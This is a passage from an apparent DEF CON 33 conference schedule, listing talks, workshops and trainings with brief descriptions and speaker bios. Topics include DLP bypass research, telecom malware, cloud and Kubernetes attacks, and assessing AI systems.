Logan Cannan received the B.S. and M.S. degrees in Computer Engineering and Cybersecurity from the University of Alabama in Huntsville. He is currently a Ph.D. candidate for a degree in Computer Engineering in a joint degree program with the University of Alabama at Birmingham and the University of Alabama in Huntsville. After spending time at Idaho National Laboratory, working in both ICS vulnerability analysis and machine learning assisted code analysis, he focused his dissertation research on optimization for machine learning on binary analysis and reverse engineering tasks.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 09:00-09:45 PDT


Title: Angry Magpie - DLP Bypass Simulator
When: Saturday, Aug 9, 09:00 - 09:45 PDT
Where: LVCCWest-Level2-W212 - Map

Description:

Angry Magpie is an open-source toolkit that demonstrates critical bypasses in enterprise Data Loss Prevention (DLP) systems through browser-based techniques. Our research identifies a class of attacks — Data Splicing — that enable exfiltration of sensitive data by transforming it to evade detection patterns used by both proxy and endpoint DLP solutions. The toolkit showcases four primary techniques: data sharding, ciphering, transcoding, and channel smuggling, each demonstrating specific architectural limitations in current DLP implementations. Security teams can use Angry Magpie to test their defense mechanisms against these practical attacks, providing valuable insights for enhancing data protection strategies. With browsers now serving as the primary access point for enterprise data, understanding and addressing these vulnerabilities has become essential for maintaining effective data security posture. Special thanks to Pankaj Sharma from the SquareX research team for his contributions to Angry Magpie toolkit.

Speakers:Jeswin Mathai,Xian Xiang Chang

SpeakerBio:  Jeswin Mathai

Jeswin leads the design and implementation of SquareX’s infrastructure. Previously, he was part of Pentester Academy (acquired by INE) where he was responsible for managing the whole lab platform that was used by thousands of customers. A seasoned speaker and researcher, Jeswin has showcased his work at prestigious international stages such as DEF CON US, DEF CON China, RootCon, Black Hat Arsenal, and Demo Labs at DEF CON. He has also imparted his knowledge globally, training in-class sessions at Black Hat US, Asia, HITB, RootCon, and OWASP NZ Day. Jeswin is also the creator of popular open-source projects such as AWSGoat, AzureGoat, and PAToolkit.

SpeakerBio:  Xian Xiang Chang

Xian is a software engineer at SquareX, contributing to the industry's first browser detection and response solution. With deep technical expertise in browser security, he architected DetectiveSQ, a containerized system for dynamically analyzing Chrome extensions, earning recognition at Black Hat Asia Arsenal and exemplifying his ability to transform complex security challenges into practical defensive tools.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 15:00-15:45 PDT


Title: Angry Magpie - DLP Bypass Simulator
When: Friday, Aug 8, 15:00 - 15:45 PDT
Where: LVCCWest-Level2-W210 - Map

Description:

Angry Magpie is an open-source toolkit that demonstrates critical bypasses in enterprise Data Loss Prevention (DLP) systems through browser-based techniques. Our research identifies a class of attacks — Data Splicing — that enable exfiltration of sensitive data by transforming it to evade detection patterns used by both proxy and endpoint DLP solutions. The toolkit showcases four primary techniques: data sharding, ciphering, transcoding, and channel smuggling, each demonstrating specific architectural limitations in current DLP implementations. Security teams can use Angry Magpie to test their defense mechanisms against these practical attacks, providing valuable insights for enhancing data protection strategies. With browsers now serving as the primary access point for enterprise data, understanding and addressing these vulnerabilities has become essential for maintaining effective data security posture. Special thanks to Pankaj Sharma from the SquareX research team for his contributions to Angry Magpie toolkit.

Speakers:Jeswin Mathai,Xian Xiang Chang

SpeakerBio:  Jeswin Mathai

Jeswin leads the design and implementation of SquareX’s infrastructure. Previously, he was part of Pentester Academy (acquired by INE) where he was responsible for managing the whole lab platform that was used by thousands of customers. A seasoned speaker and researcher, Jeswin has showcased his work at prestigious international stages such as DEF CON US, DEF CON China, RootCon, Black Hat Arsenal, and Demo Labs at DEF CON. He has also imparted his knowledge globally, training in-class sessions at Black Hat US, Asia, HITB, RootCon, and OWASP NZ Day. Jeswin is also the creator of popular open-source projects such as AWSGoat, AzureGoat, and PAToolkit.

SpeakerBio:  Xian Xiang Chang

Xian is a software engineer at SquareX, contributing to the industry's first browser detection and response solution. With deep technical expertise in browser security, he architected DetectiveSQ, a containerized system for dynamically analyzing Chrome extensions, earning recognition at Black Hat Asia Arsenal and exemplifying his ability to transform complex security challenges into practical defensive tools.


Return to Index    -    Add to Google    -    ics Calendar file

TELV - Saturday - 10:00-10:45 PDT


Title: Anotomy of Telecom Malware
When: Saturday, Aug 9, 10:00 - 10:45 PDT
Where: LVCCWest-Level2-W229 - Map

Description:

“Anatomy of Telecom Malware” is a Telecom Village talk spanning 2G, 3G, 4G/LTE and cloud-native 5G. It dissects how attackers weaponise every layer of the stack—SS7/SIGTRAN, Diameter, GTP, SMPP and SBA APIs—while adding three critical lenses:

Attendees leave with a telecom-specific kill-chain map, protocol-aware detection tricks, and a 10-point hardening checklist to protect both legacy and future networks.

SpeakerBio:  Akib Sayyed, Founder at Matrix Shell

Akib Sayyed is the Founder and Chief Security Consultant of Matrix-Shell Technologies, an India-based telecom-security firm he established in 2014. Recognised industry-wide as a 5G and telecom-signalling security specialist, Akib has spent more than a decade helping mobile-network operators, MVNOs and regulators uncover and remediate vulnerabilities across legacy (2G/3G/4G) and next-generation (5G Core, VoLTE/VoNR/VoWi-Fi) networks. His expertise spans protocol penetration testing (SS7, Diameter, GTP), radio-access assessments and security-automation tooling.

Under Akib’s leadership, Matrix-Shell has grown into India’s first NCCS-designated 5G Core security test lab and holds ISO/IEC 17025 accreditation for its methodology and results. A frequent conference speaker and Black Hat trainer, he also co-organises the Telecom Village community, where he shares latest threat-intel and open-source tools with the wider security ecosystem. linkedin.com

Across consulting engagements, Akib is known for delivering:

Driven by a mission to “secure the core,” Akib continues to advise operators on rolling out resilient 5G infrastructure, mentors the next wave of telecom-security engineers and contributes to global standards bodies shaping the future of mobile-network defence.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 10:00-10:45 PDT


Title: AppleStorm - Unmasking the Privacy Risks of Apple Intelligence
When: Saturday, Aug 9, 10:00 - 10:45 PDT
Where: LVCCWest-Level1-Hall3-Track 2 - Map

Description:

Apple Intelligence, Apple’s newest AI product, is designed to enhance productivity with AI while maintaining Apple's focus on user experience and privacy, often highlighting its use of localized models as a key advantage. But how well do these assurances hold up under scrutiny? While Apple emphasizes privacy as a core principle, my findings challenge some of these claims, illustrating the importance of scrutinizing AI-driven assistants before widespread adoption.

In this talk, we take a closer look at the data flows within Apple Intelligence, examining how it interacts with user data and the potential security and privacy risks that come with it. Using traffic analysis and OS inspection techniques, we explore what information is accessed, how it moves through the system, and where it gets transmitted. Our findings challenge common security assumptions of Apple, revealing unexpected behaviors and data leaks. From encrypted traffic to data leakage concerns, this presentation will provide practical insights for users and security professionals alike.

SpeakerBio:  Yoav Magid

Yoav Magid is a security researcher at Lumia Security, where his work centers on AI security. Yoav’s other topics of interest are social engineering and embedded operating systems. With a solid foundation in cybersecurity, Yoav holds a B.Sc. in Computer Science and is currently preparing to pursue an MBA.

Bringing over seven years of cyber security experience, he has honed his skills in embedded research and programming, tackling real-world challenges in high-stakes environments. Yoav also founded a large-scale LGBTQIA+ Employee Resource Group (ERG) that fosters international collaboration and support in his last organization.


Return to Index    -    Add to Google    -    ics Calendar file

CRE - Friday - 16:00-17:50 PDT


Title: Applied Cryptocurrency Hardware
When: Friday, Aug 8, 16:00 - 17:50 PDT
Where: LVCCWest-Level1-Hall4-Communities-C101 - Map

Description:

Using an electronic circuit camera, we zoom in on cryptosecure devices and their circuits. Descriptions of existing cryptocurrency hardware lead to consideration of future integrations in the physical world and how secure elements work. We pass around a showcase of half a dozen wallets and similar hardware, as well as Nitrokeys (for defence) and ChipWhisperers (for attack.) We get set up with a set of hardware development software tools, and consider the physical production workflow that top manufacturers follow in high security areas.

Speakers:Param D Pithadia,Michael "MSvB" Schloh von Bennewitz

SpeakerBio:  Param D Pithadia, Georgia Institute of Technology

Param is an Electrical Engineering Student from Georgia Tech with a strong passion for and interest in crypto. Although he primarily got interested in cryptography and hardware security through a class at Georgia Tech, he is also working at a software company on crypto adoption and ease of use. With a unique blend of HW and SW skills, Param is truly enthusiastic about all aspects of crypto.

SpeakerBio:  Michael "MSvB" Schloh von Bennewitz, Chairman, Monero Devices

Michael Schloh von Bennewitz (MSvB) is a computer scientist specializing in cryptosecure electronics and embedded development. He is the founder of Monero Devices and responsible for research, development, and maintenance of Opensource software repositories. A prolific speaker in four languages, Michael presents at technical meetings every year.


Return to Index    -    Add to Google    -    ics Calendar file

PGE - Friday - 21:00-01:59 PDT


Title: Arcade Party
When: Friday, Aug 8, 21:00 - 01:59 PDT
Where: LVCCWest-Level2-W228-W229 - Map

Description:

The Arcade Party is back! Come play your favorite classic arcade games while jamming out to Keith Myers DJing. Your favorite custom built 16 player LED foosball table will be ready for some competitive games. This epic party, free for DEF CON 33 attendees to enjoy and play, is hosted by the Military Cyber Professionals Association (a tech ed charity) and friends. 


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Sunday - 10:00-11:45 PDT


Title: Ask a Hiring Manager with Cory Wolff
When: Sunday, Aug 10, 10:00 - 11:45 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Track 2 - Map

Description:

"Ask a Hiring Manager" is an interactive group workshop designed to give job seekers and professionals direct access to seasoned hiring managers across various cybersecurity roles. Whether you're a recent graduate, transitioning from another field, or already working in security and exploring what's next, this is your chance to get unfiltered answers to the questions that matter most.

SpeakerBio:  Cory Wolff

With over 20 years of experience in IT, security, and development, Cory Wolff leads the offensive security practice at risk3sixty, a consulting firm based in Atlanta, GA. He holds multiple certifications, including the Offensive Security Certified Professional (OSCP) and the Certified Information Systems Security Professional (CISSP), and has a proven track record of building and breaking various technologies since his first computer in 1988.

Cory also contributes to the cybersecurity community as a core team member of Red Team Village, a platform that fosters collaboration, learning, and innovation among red teamers and security professionals.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Sunday - 10:00-11:45 PDT


Title: Ask a Hiring Manager with Peter Hefley
When: Sunday, Aug 10, 10:00 - 11:45 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Track 3 - Map

Description:

"Ask a Hiring Manager" is an interactive group workshop designed to give job seekers and professionals direct access to seasoned hiring managers across various cybersecurity roles. Whether you're a recent graduate, transitioning from another field, or already working in security and exploring what's next, this is your chance to get unfiltered answers to the questions that matter most.

SpeakerBio:  Peter Hefley

Team and people builder for over 20 years, primarily in the offensive security space.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Sunday - 10:00-11:45 PDT


Title: Ask a Hiring Manager with Troy Fridley
When: Sunday, Aug 10, 10:00 - 11:45 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Track 1 - Map

Description:

"Ask a Hiring Manager" is an interactive group workshop designed to give job seekers and professionals direct access to seasoned hiring managers across various cybersecurity roles. Whether you're a recent graduate, transitioning from another field, or already working in security and exploring what's next, this is your chance to get unfiltered answers to the questions that matter most.

SpeakerBio:  Troy Fridley
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 14:30-16:15 PDT


Title: Ask EFF
When: Saturday, Aug 9, 14:30 - 16:15 PDT
Where: LVCCWest-Level1-Hall3-Track 4 - Map

Description:

Electronic Frontier Foundation (EFF) is excited to be back at DEF CON. Our expert panelists will offer brief updates on EFF's work defending your digital rights, before opening the floor for attendees to ask their questions. This dynamic conversation centers challenges DEF CON attendees actually face, and is an opportunity to connect on common causes.

This year you’ll meet:

Speakers:Hannah Zhao,Alexis Hancock,Cooper "CyberTiger" Quintin,Lisa Femia,Thorin Klosowski

SpeakerBio:  Hannah Zhao, Senior Staff Attorney, Coders' Rights Project at EFF

Hannah is a senior staff attorney who focuses on criminal justice, privacy, and cybersecurity issues, and is part of the Coders’ Rights Project.

SpeakerBio:  Alexis Hancock, Director of Engineering at EFF

Alexis is an expert technologist and researcher on the security vulnerabilities which plague consumer electronics, and can speak to the disparate impact they have on communities.

SpeakerBio:  Cooper "CyberTiger" Quintin, Senior Staff Technologist at EFF

Cooper Quintin is a senior public interest technologist with the EFF Threat Lab. He has given talks about security research at prestigious security conferences including Black Hat, DEFCON, Shmoocon, and ReCon about issues ranging from IMSI Catcher detection to Femtech privacy issues to newly discovered APTs. He has two children and is very tired.

Cooper has many years of security research experience on tools of surveillance used by government agencies.

SpeakerBio:  Lisa Femia, Staff Attorney at EFF

focuses on surveillance, privacy, free speech, and the impact of technology on civil rights and civil liberties

SpeakerBio:  Thorin Klosowski

Thorin is the Security and Privacy Activist at EFF, where he focuses on providing practical advice to protecting online security, including handling much of Surveillance Self-Defense.


Return to Index    -    Add to Google    -    ics Calendar file

AIV - Saturday - 14:15-14:59 PDT


Title: Assessing the Capabilities Gap Between Foundation Models and Cybersecurity Experts: Benchmarks, Safeguards, and Policy
When: Saturday, Aug 9, 14:15 - 14:59 PDT
Where: LVCCWest-Level2-W233 - Map

Description:

Rapid advancements in AI raise important concerns about cybersecurity risks. While existing work shows AI still falls short of human expertise in cybersecurity, we aim to identify indicators of emerging capabilities and risks by studying the gap between AI and expert human performance. We compare top hackers—selected for their proven track record in security research and competitions—with AI systems attempting to exploit real and synthetic targets. This comparison helps us pinpoint where current frontier model evaluations fall short, what tacit knowledge is needed to exploit vulnerabilities effectively, and how these gaps might be addressed. By distilling the expertise, intuition, and problem-solving approaches that make human experts more effective than current foundation models, we highlight the unique skills that continue to differentiate human practitioners. Conversely, we seek to identify areas where AI’s latent capabilities may offer distinct advantages, helping experts better leverage these tools in their work. Our work aims to improve AI cybersecurity evaluations, address critical gaps in evidence-based policymaking, and better equip practitioners to adapt to shifts in the offense/defense landscape.

SpeakerBio:  Justin W. Lin
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

TRN - Monday - 08:00-16:59 PDT


Title: Attack and Defend Software Supply Chain
When: Monday, Aug 11, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

In today's interconnected world, software development relies heavily on third-party components---up to 80% of your code could come from external sources. This reliance creates a complex web of dependencies, making your software supply chain a prime target for cybercriminals. Securing it is no longer optional; it's essential.

This hands-on course takes a comprehensive approach to attacking and securing the software supply chain. In the first section, you'll assume the role of a sophisticated attacker, infiltrating an enterprise through its supply chain partners. You'll learn how to compromise developer laptops, code repositories, CI/CD pipelines, internal registries, and even production environments. Once you've seen how vulnerabilities can be exploited, we'll pivot to defense.

In the second section, we'll build and secure a GitHub organization, configure repositories, and implement best practices to mitigate risks. You'll learn how to secure IaC (Infrastructure as Code) assets, validate third-party code, and remediate vulnerabilities to ensure end-to-end protection.

Through practical exercises, you'll apply these strategies to safeguard your developer environments, CI/CD pipelines, and production systems. By the end of the course, you'll have the knowledge and tools to turn your software supply chain into a security strength rather than a liability.

SpeakerBio:  Anant Shrivastava

Anant Shrivastava is a highly experienced information security professional with over 15 years of corporate experience. He is a frequent speaker and trainer at international conferences, and is the founder of Cyfinoid Research, a cyber security research firm. He leads open source projects such as Tamer Platform and CodeVigilant, and is actively involved in information security communities such as null, OWASP and various BSides Chapters and DefCon groups.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: Attack and Defend Software Supply Chain
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

In today's interconnected world, software development relies heavily on third-party components---up to 80% of your code could come from external sources. This reliance creates a complex web of dependencies, making your software supply chain a prime target for cybercriminals. Securing it is no longer optional; it's essential.

This hands-on course takes a comprehensive approach to attacking and securing the software supply chain. In the first section, you'll assume the role of a sophisticated attacker, infiltrating an enterprise through its supply chain partners. You'll learn how to compromise developer laptops, code repositories, CI/CD pipelines, internal registries, and even production environments. Once you've seen how vulnerabilities can be exploited, we'll pivot to defense.

In the second section, we'll build and secure a GitHub organization, configure repositories, and implement best practices to mitigate risks. You'll learn how to secure IaC (Infrastructure as Code) assets, validate third-party code, and remediate vulnerabilities to ensure end-to-end protection.

Through practical exercises, you'll apply these strategies to safeguard your developer environments, CI/CD pipelines, and production systems. By the end of the course, you'll have the knowledge and tools to turn your software supply chain into a security strength rather than a liability.

SpeakerBio:  Anant Shrivastava

Anant Shrivastava is a highly experienced information security professional with over 15 years of corporate experience. He is a frequent speaker and trainer at international conferences, and is the founder of Cyfinoid Research, a cyber security research firm. He leads open source projects such as Tamer Platform and CodeVigilant, and is actively involved in information security communities such as null, OWASP and various BSides Chapters and DefCon groups.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 10:00-10:45 PDT


Title: Attack Flow and Root Cause Discovery - No LLMs, No Queries, Just Explainable ML
When: Saturday, Aug 9, 10:00 - 10:45 PDT
Where: LVCCWest-Level2-W208 - Map

Description:

Attack Flow Detector is an open-source tool that helps defenders uncover coordinated cyber attacks buried in noisy alert data. Instead of relying on LLMs or black-box AI, it uses explainable machine learning to map alerts, logs, and telemetry to MITRE ATT&CK techniques, cluster them into contextualized attack steps, and chain them into complete killchains. Built for blue teamers and SOC analysts, it's lightweight, interpretable, and easy to deploy in real environments. This demo will show how the tool processes real-world-style data, generates actionable tickets, and supports root cause analysis. If you're drowning in false positives or lone incidents, this is for you.

Speakers:Ezz Tahoun,Kevin Shi

SpeakerBio:  Ezz Tahoun

Ezz Tahoun is an award-winning cybersecurity data scientist recognized globally for his innovations in applying AI to security operations. He has presented at multiple DEFCON villages, including Blue Team, Cloud, Industrial Control Systems (ICS), Adversary, Wall of Sheep, Packet Hacking, Telecom, and Creator Stage, as well as BlackHat Sector, MEA, EU, and GISEC. His groundbreaking work earned him accolades from Yale, Princeton, Northwestern, NATO, Microsoft, and Canada's Communications Security Establishment. At 19, Ezz began his PhD in Computer Science at the University of Waterloo, quickly gaining recognition through 20 influential papers and 15 open-source cybersecurity tools. His professional experience includes leading advanced AI-driven projects for Orange CyberDefense, Forescout, RBC, and Huawei Technologies US. Holding certifications such as aCCISO, CISM, CRISC, GCIH, GSEC, CEH, and GCP-Cloud Architect, Ezz previously served as an adjunct professor in cyber defense and warfare.

SpeakerBio:  Kevin Shi

Kevin is a data scientist specializing in cybersecurity and machine learning, currently working at the Canadian Institute for Cybersecurity at the University of New Brunswick. He holds a Master’s degree in Data Science from the University of Windsor, where he focused on applying advanced analytics and machine learning techniques to complex cybersecurity problems. His expertise includes developing and optimizing AI-driven methods for threat detection, anomaly identification, and security event analysis. His research contributions emphasize practical implementations of data science in cybersecurity operations, bridging theoretical approaches with real-world applications.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 10:00-10:45 PDT


Title: Attack Flow and Root Cause Discovery - No LLMs, No Queries, Just Explainable ML
When: Friday, Aug 8, 10:00 - 10:45 PDT
Where: LVCCWest-Level2-W211 - Map

Description:

Attack Flow Detector is an open-source tool that helps defenders uncover coordinated cyber attacks buried in noisy alert data. Instead of relying on LLMs or black-box AI, it uses explainable machine learning to map alerts, logs, and telemetry to MITRE ATT&CK techniques, cluster them into contextualized attack steps, and chain them into complete killchains. Built for blue teamers and SOC analysts, it's lightweight, interpretable, and easy to deploy in real environments. This demo will show how the tool processes real-world-style data, generates actionable tickets, and supports root cause analysis. If you're drowning in false positives or lone incidents, this is for you.

Speakers:Ezz Tahoun,Kevin Shi

SpeakerBio:  Ezz Tahoun

Ezz Tahoun is an award-winning cybersecurity data scientist recognized globally for his innovations in applying AI to security operations. He has presented at multiple DEFCON villages, including Blue Team, Cloud, Industrial Control Systems (ICS), Adversary, Wall of Sheep, Packet Hacking, Telecom, and Creator Stage, as well as BlackHat Sector, MEA, EU, and GISEC. His groundbreaking work earned him accolades from Yale, Princeton, Northwestern, NATO, Microsoft, and Canada's Communications Security Establishment. At 19, Ezz began his PhD in Computer Science at the University of Waterloo, quickly gaining recognition through 20 influential papers and 15 open-source cybersecurity tools. His professional experience includes leading advanced AI-driven projects for Orange CyberDefense, Forescout, RBC, and Huawei Technologies US. Holding certifications such as aCCISO, CISM, CRISC, GCIH, GSEC, CEH, and GCP-Cloud Architect, Ezz previously served as an adjunct professor in cyber defense and warfare.

SpeakerBio:  Kevin Shi

Kevin is a data scientist specializing in cybersecurity and machine learning, currently working at the Canadian Institute for Cybersecurity at the University of New Brunswick. He holds a Master’s degree in Data Science from the University of Windsor, where he focused on applying advanced analytics and machine learning techniques to complex cybersecurity problems. His expertise includes developing and optimizing AI-driven methods for threat detection, anomaly identification, and security event analysis. His research contributions emphasize practical implementations of data science in cybersecurity operations, bridging theoretical approaches with real-world applications.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Monday - 08:00-16:59 PDT


Title: Attacking & Securing CI/CD Pipeline Certification (ASCPC) by White Knight Labs
When: Monday, Aug 11, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

The Attacking and Securing CI/CD course is an on-demand and self-paced program designed to equip participants with the knowledge and skills to identify vulnerabilities and implement security measures within Continuous Integration and Continuous Deployment (CI/CD) pipelines. This course combines theoretical knowledge with practical, hands-on labs that simulate real-world scenarios in a CI/CD environment.

SpeakerBio:  Raunak Parmar, Senior Cloud Security Engineer at White Knight Labs

Raunak Parmar works as a senior cloud security engineer at White Knight Labs. His areas of interest include web penetration testing, Azure/AWS security, source code review, scripting, and development. He enjoys researching new attack methodologies and creating open-source tools that can be used during cloud red team activities. He has worked extensively on Azure and AWS and is the author of Vajra, an offensive cloud security tool. He has spoken at multiple respected security conferences like Black Hat, Defcon, Nullcon, RootCon, and also at local meetups.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: Attacking & Securing CI/CD Pipeline Certification (ASCPC) by White Knight Labs
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

The Attacking and Securing CI/CD course is an on-demand and self-paced program designed to equip participants with the knowledge and skills to identify vulnerabilities and implement security measures within Continuous Integration and Continuous Deployment (CI/CD) pipelines. This course combines theoretical knowledge with practical, hands-on labs that simulate real-world scenarios in a CI/CD environment.

SpeakerBio:  Raunak Parmar, Senior Cloud Security Engineer at White Knight Labs

Raunak Parmar works as a senior cloud security engineer at White Knight Labs. His areas of interest include web penetration testing, Azure/AWS security, source code review, scripting, and development. He enjoys researching new attack methodologies and creating open-source tools that can be used during cloud red team activities. He has worked extensively on Azure and AWS and is the author of Vajra, an offensive cloud security tool. He has spoken at multiple respected security conferences like Black Hat, Defcon, Nullcon, RootCon, and also at local meetups.


Return to Index    -    Add to Google    -    ics Calendar file

BBV - Friday - 11:00-11:59 PDT


Title: Attacking AI
When: Friday, Aug 8, 11:00 - 11:59 PDT
Where: LVCCWest-Level3-W326 - Map

Description:

Attacking AI is a one of a kind session releasing case studies, tactics, and methodology from Arcanum’s AI assessments in 2024 and 2025. While most AI assessment material focuses on academic AI red team content, “Attacking AI” is focused on the task of assessing AI enabled systems. Join Jason as he discusses his seven point methodology to assessing these systems and releases Arcanum’s prompt injection taxonomy and other resources for aspiring testers.

SpeakerBio:  Jason "jhaddix" Haddix, Field CISO at flare.io

Jason has had a distinguished 20-year career in cybersecurity, previously serving as CISO of Buddobot, CISO of Ubisoft, Head of Trust/Security/Operations at Bugcrowd, Director of Penetration Testing at HP, and Lead Penetration Tester at Redspin.

He has also held positions doing mobile penetration testing, network/infrastructure security assessments, and static analysis.

Jason is a hacker, bug hunter, and is currently ranked 57th all-time on Bugcrowd's bug bounty leaderboards. Currently, he specializes in recon, web application analysis, and emerging technologies.

Jason has also authored many talks for world-renowned conferences like DEF CON, Bsides, Black Hat, RSA, OWASP, Nullcon, SANS, IANS, BruCon, ToorCon, and many more.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Sunday - 10:00-11:55 PDT


Title: Attacking Kubernetes: Tools and Tactics to Compromise Your First Cluster
When: Sunday, Aug 10, 10:00 - 11:55 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Tactics 2 - Map

Description:

Kubernetes is the de facto operating system of the cloud, and more and more organizations are running their workloads on Kubernetes. While Kubernetes offers many benefits, it also introduces new security risks, such as cluster misconfiguration, leaked credentials, cryptojacking, container escapes, and vulnerable clusters.

In this hands-on session, attendees will dive into the world of Kubernetes security by exploring powerful open source tools and practical techniques used to audit and exploit K8S clusters. You'll learn how to quickly identify misconfigurations and vulnerabilities in containerized applications running on Kubernetes, leverage those weaknesses to steal service account tokens, move laterally across the environment, and potentially take full control of the cluster. Whether you're a red teamer, bug bounty hunter, or just getting started in cloud security, this session will equip you with the skills to pwn your first Kubernetes cluster.

SpeakerBio:  Lenin Alevski

Lenin Alevski is a Full Stack Engineer and generalist with a lot of passion for Information Security. Currently working as a Security Engineer at Google. Lenin specializes in building and maintaining Distributed Systems, Application Security and Cloud Security in general. Lenin loves to play CTFs, contributing to open-source and writing about security and privacy on his personal blog https://www.alevsk.com.


Return to Index    -    Add to Google    -    ics Calendar file

CON - Friday - 10:00-11:59 PDT


Title: Aw, man...pages!
When: Friday, Aug 8, 10:00 - 11:59 PDT
Where: LVCCWest-Level1-Atrium-East-Contest Stage

Description:

How well do you know your man pages? Find out by teaming up with up to 3 other people (or come solo and get matched up with some new friends) and play "Aw, man...pages!". Across several rounds, your knowledge of man pages will be tested to the limit. Can you remember what command line flag is being described by its help text? Can you identify a tool just from a man page snippet? Can you provide the long-form flag when only given the short? Will you prove yourself worthy to be crowned the man page champion?

Participant Prerequisites

None. We will provide answer sheets and pens. Participants can form teams of up to 4 people beforehand, or at the event (last year's winners all met each other at the contest).

Pre-Qualification

No


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Monday - 08:00-16:59 PDT


Title: Azure Cloud Attacks for Red & Blue Teams - Beginner Edition
When: Monday, Aug 11, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

More than 95 percent of Fortune 500 use Azure today! A huge number of organizations use Azure AD (Entra ID) as an Identity and Access Management platform. This makes it imperative to understand the risks associated with Azure as it contains an enterprises infrastructure, apps, identities and a lot more!

In addition to cloud-only identity, the ability to connect on-prem Active Directory, applications and infrastructure to Azure brings some very interesting opportunities and risks too. Often complex to understand, this setup of components, infrastructure and identity is a security challenge.

This hands-on training aims towards abusing Azure and a number of services offered by it. We will cover multiple complex attack lifecycles against a lab containing multiple live Azure tenants.

All the phases of Azure red teaming and pentesting – Recon, Initial access, Enumeration, Privilege Escalation, Lateral Movement, Persistence and Data mining are covered. We will also discuss detecting and monitoring for the techniques we use.

The course is a mixture of fun, demos, exercises, hands-on and lecture. The training focuses more on methodology and techniques than tools. If you are a security professional trying to improve your skills in Azure cloud security, Azure Pentesting or Red teaming the Azure cloud this is the right class for you!

Following topics are covered:

Attendees will get free two months access to an Azure environment comprising of multiple tenants and a Certified by AlteredSecurity Red Team Professional for Azure (CARTP) certification attempt.

SpeakerBio:  Nikhil, Founder at Altered Security

Nikhil’s areas of interest include red teaming, Azure and active directory security, attack research, defense strategies and post exploitation research. He has 15+ years of experience in red teaming.

He specializes in assessing security risks in secure environments that require novel attack vectors and "out of the box" approach. He has worked extensively on Azure, Active Directory attacks, defense and bypassing detection mechanisms. Nikhil has held trainings and bootcamps for various corporate clients (in US, Europe and SE Asia), and at the world's top information security conferences.

He has spoken/trained at conferences like DEF CON, BlackHat, BruCON and more.

Nikhil is the founder of Altered Security - a company focusing on hands-on enterprise security learning - https://www.alteredsecurity.com/


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: Azure Cloud Attacks for Red & Blue Teams - Beginner Edition
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

More than 95 percent of Fortune 500 use Azure today! A huge number of organizations use Azure AD (Entra ID) as an Identity and Access Management platform. This makes it imperative to understand the risks associated with Azure as it contains an enterprises infrastructure, apps, identities and a lot more!

In addition to cloud-only identity, the ability to connect on-prem Active Directory, applications and infrastructure to Azure brings some very interesting opportunities and risks too. Often complex to understand, this setup of components, infrastructure and identity is a security challenge.

This hands-on training aims towards abusing Azure and a number of services offered by it. We will cover multiple complex attack lifecycles against a lab containing multiple live Azure tenants.

All the phases of Azure red teaming and pentesting – Recon, Initial access, Enumeration, Privilege Escalation, Lateral Movement, Persistence and Data mining are covered. We will also discuss detecting and monitoring for the techniques we use.

The course is a mixture of fun, demos, exercises, hands-on and lecture. The training focuses more on methodology and techniques than tools. If you are a security professional trying to improve your skills in Azure cloud security, Azure Pentesting or Red teaming the Azure cloud this is the right class for you!

Following topics are covered:

Attendees will get free two months access to an Azure environment comprising of multiple tenants and a Certified by AlteredSecurity Red Team Professional for Azure (CARTP) certification attempt.

SpeakerBio:  Nikhil, Founder at Altered Security

Nikhil’s areas of interest include red teaming, Azure and active directory security, attack research, defense strategies and post exploitation research. He has 15+ years of experience in red teaming.

He specializes in assessing security risks in secure environments that require novel attack vectors and "out of the box" approach. He has worked extensively on Azure, Active Directory attacks, defense and bypassing detection mechanisms. Nikhil has held trainings and bootcamps for various corporate clients (in US, Europe and SE Asia), and at the world's top information security conferences.

He has spoken/trained at conferences like DEF CON, BlackHat, BruCON and more.

Nikhil is the founder of Altered Security - a company focusing on hands-on enterprise security learning - https://www.alteredsecurity.com/


Return to Index    -    Add to Google    -    ics Calendar file

CPV - Friday - 12:30-12:59 PDT


Title: Back to Basics: Building Resilient Cyber Defenses
When: Friday, Aug 8, 12:30 - 12:59 PDT
Where: LVCCWest-Level2-W232 - Map

Description:

In spite of novel cybersecurity threats, digital security advice has remained largely unchanged in recent years. In fact, much of the viral advice in response to high-profile attacks or threats doesn't actually address the risks people are most likely to face. In this talk, we'll analyze high-profile digital privacy and security concerns, whether the viral advice to address said concerns is effective and practical, and what steps could be taken—both before and after an issue arises.

SpeakerBio:  Yael Grauer, Program Manager of Cybersecurity Research at Consumer Reports

Yael Grauer is a program manager of cybersecurity research at Consumer Reports. She also does freelance investigative tech reporting, maintains the Big Ass Data Broker Opt-Out List, and is a proud member of the Lockdown Systems Collective.


Return to Index    -    Add to Google    -    ics Calendar file

CRE - Friday - 17:00-17:59 PDT


Title: Badgelife: Lessons from Years of Do’s, Don’ts, and Last-Minute Saves
